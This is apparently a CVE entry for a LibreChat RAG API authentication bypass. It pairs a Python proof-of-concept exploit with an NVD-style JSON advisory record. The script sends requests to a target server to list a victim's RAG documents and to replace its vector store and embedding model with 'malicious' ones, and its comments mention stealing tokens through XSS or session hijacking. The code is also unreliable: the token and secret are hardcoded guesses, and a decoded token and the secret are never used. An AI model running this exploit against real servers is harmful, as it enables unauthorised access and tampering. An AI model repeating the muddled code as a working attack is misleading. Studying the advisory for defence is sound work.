CVE-2025-41258

import requests import jwt import json # CVE-2025-41258 PoC - LibreChat RAG API Authentication Bypass # This PoC demonstrates how to exploit the shared JWT secret vulnerability TARGET_URL = "http://target-librechat-server.com" RAG_API_ENDPOINT = f"{TARGET_URL}/api/rag" # Step 1: Obtain a valid JWT token from any authenticated user session # This can be done via XSS, session hijacking, or from intercepted traffic def get_user_jwt_token(): # Example: Extract token from login response or browser storage # In real attack, obtain via legitimate login or other techniques return "user_jwt_token_here" # Step 2: Extract the shared JWT secret from the application # The secret is used for both user sessions and RAG API authentication def extract_jwt_secret(jwt_token): # Decode token without verification to extract header decoded = jwt.decode(jwt_token, options={"verify_signature": False}) # The secret can be extracted from application source code or configuration # Default shared secret in vulnerable version return "librechat_shared_jwt_secret" # Step 3: Craft malicious request to RAG API using hijacked token def exploit_rag_api(user_token, jwt_secret): headers = { "Authorization": f"Bearer {user_token}", "Content-Type": "application/json" } # Exploit: Access RAG documents without proper authorization payload = { "action": "list_documents", "user_id": "victim_user_id" } response = requests.post(RAG_API_ENDPOINT, json=payload, headers=headers) print(f"Status: {response.status_code}") print(f"Response: {response.text}") return response.json() # Step 4: Modify RAG configuration or extract sensitive data def modify_rag_config(user_token, jwt_secret): headers = { "Authorization": f"Bearer {user_token}", "Content-Type": "application/json" } payload = { "action": "update_config", "vector_store": "malicious_vector_store", "embedding_model": "malicious_model" } response = requests.post(f"{RAG_API_ENDPOINT}/config", json=payload, headers=headers) return response if __name__ == "__main__": print("CVE-2025-41258 LibreChat RAG API Authentication Bypass") token = get_user_jwt_token() secret = extract_jwt_secret(token) exploit_rag_api(token, secret)

{"cve": {"id": "CVE-2025-41258", "sourceIdentifier": "1e3a9e0f-5156-4bf8-b8a3-cc311bfc0f4a", "published": "2026-03-18T12:16:18.713", "lastModified": "2026-03-24T18:41:38.697", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LibreChat version 0.8.1-rc2 uses the same JWT secret for the user session mechanism and RAG API which compromises the service-level authentication of the RAG API."}, {"lang": "es", "value": "La versión 0.8.1-rc2 de LibreChat utiliza el mismo secreto JWT para el mecanismo de sesión de usuario y la API RAG, lo que compromete la autenticación a nivel de servicio de la API RAG."}], "metrics": {"cvssMetricV31": [{"source": "1e3a9e0f-5156-4bf8-b8a3-cc311bfc0f4a", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "1e3a9e0f-5156-4bf8-b8a3-cc311bfc0f4a", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:librechat:librechat:0.8.1:rc2:*:*:*:*:*:*", "matchCriteriaId": "EF5CED68-4B6B-4E56-A41E-92DC7E7DD94D"}]}]}], "references": [{"url": "https://github.com/danny-avila/LibreChat", "source": "1e3a9e0f-5156-4bf8-b8a3-cc311bfc0f4a", "tags": ["Product"]}, {"url": "https://github.com/sbaresearch/advisories/tree/public/2025/SBA-ADV-20251205-01_LibreChat_RAG_API_Authentication_Bypass", "source": "1e3a9e0f-5156-4bf8-b8a3-cc311bfc0f4a", "tags": ["Exploit", "Third Party Advisory"]}]}}